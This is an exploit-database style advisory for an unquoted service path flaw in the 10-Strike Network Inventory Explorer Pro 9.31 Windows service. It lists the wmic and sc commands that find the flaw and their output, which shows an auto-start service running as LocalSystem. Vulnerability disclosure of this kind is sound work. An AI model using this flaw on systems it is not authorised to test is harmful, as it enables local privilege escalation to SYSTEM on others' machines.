Exploit for 10-Strike Network Inventory Explorer Pro 9.31 Unquoted Service Path

Name: Exploit for 10-Strike Network Inventory Explorer Pro 9.31 Unquoted Service Path
Rating: 5 (294 reviews)

2021-11-05 | CVSS 7.1

## https://sploitus.com/exploit?id=PACKETSTORM:164771
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path  
# Discovery by: Brian Rodriguez  
# Date: 04-11-2021  
# Vendor Homepage: https://www.10-strike.com/  
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe  
# Tested Version: 9.31  
# Vulnerability Type: Unquoted Service Path  
# Tested on: Windows 10 Enterprise 64 bits  
  
# Step to discover Unquoted Service Path:  
  
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"  
|findstr /i /v "c:\windows\\" |findstr /i /v """  
  
srvInventoryWebServer srvInventoryWebServer C:\Program Files  
(x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe  
Auto  
  
C:\>sc qc srvInventoryWebServer  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: srvInventoryWebServer  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\10-Strike Network  
Inventory Explorer Pro\InventoryWebServer.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : srvInventoryWebServer  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem